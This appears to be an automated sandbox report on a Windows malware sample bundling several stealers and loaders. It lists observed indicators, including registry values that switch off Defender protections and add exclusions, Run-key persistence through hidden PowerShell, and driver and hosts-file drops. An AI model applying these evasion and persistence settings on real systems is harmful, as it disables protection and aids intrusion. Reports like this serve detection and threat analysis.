Malware Analysis Report

2025-08-05 19:01

Sample ID 231019-qacy6sga7x
Target file.exe
SHA256 d14f3781a88172e83ee0797e6388a05c9a1cf8026ccaa0331c86ad8a72ec5775
Tags
dcrat glupteba redline sectoprat smokeloader 5141679758_99 @ytlogsbot breha kukish pixelscloud2.0 up3 backdoor discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan amadey microsoft phishing
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d14f3781a88172e83ee0797e6388a05c9a1cf8026ccaa0331c86ad8a72ec5775

Threat Level: Known bad

The file file.exe was found to be: Known bad.

Malicious Activity Summary


DcRat

Modifies Windows Defender Real-time Protection settings

Windows security bypass

RedLine payload

SectopRAT

Amadey

Glupteba payload

RedLine

SectopRAT payload

Suspicious use of NtCreateUserProcessOtherParentProcess

Glupteba

SmokeLoader

Modifies boot configuration data using bcdedit

Downloads MZ/PE file

Stops running service(s)

Possible attempt to disable PatchGuard

Drops file in Drivers directory

Modifies Windows Firewall

.NET Reactor protector

Executes dropped EXE

Checks computer location settings

Reads user/profile data of local email clients

Windows security modification

Uses the VBS compiler for execution

Reads user/profile data of web browsers

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Manipulates WinMonFS driver.

Drops file in System32 directory

Detected potential entity reuse from brand microsoft.

Suspicious use of SetThreadContext

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Unsigned PE

Program crash

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Checks SCSI registry key(s)

Suspicious use of SendNotifyMessage

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-19 13:03

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-19 13:03

Reported

2023-10-19 13:05

Platform

win7-20230831-en

Max time kernel

149s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

DcRat

rat infostealer dcrat
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Windows\system32\drivers\Winmon.sys C:\Windows\rss\csrss.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CE77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D32A.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D6C4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFDA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E4AB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E91F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\F2E0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1A9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\27C8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\30CE.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\file.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Pm6119.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4HS096BX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\1AP90VT0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP007.TMP\2ki127Ll.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\D6C4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFDA.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\DFDA.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Windows\system32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\taskeng.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Uses the VBS compiler for execution

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\D50F.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1fX89KT6.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\TK1xO34.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\qS9tw1uX.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\27C8.exe'\"" C:\Users\Admin\AppData\Local\Temp\27C8.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\VH4vX77.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\DO2BB55.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\ro8sA21.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\sC2xv8pP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\hd8Im5XM.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\CD8C.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\AH0ga1vM.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20231019130416.cab C:\Windows\system32\makecab.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\DFDA.exe

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3qu90Pt.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
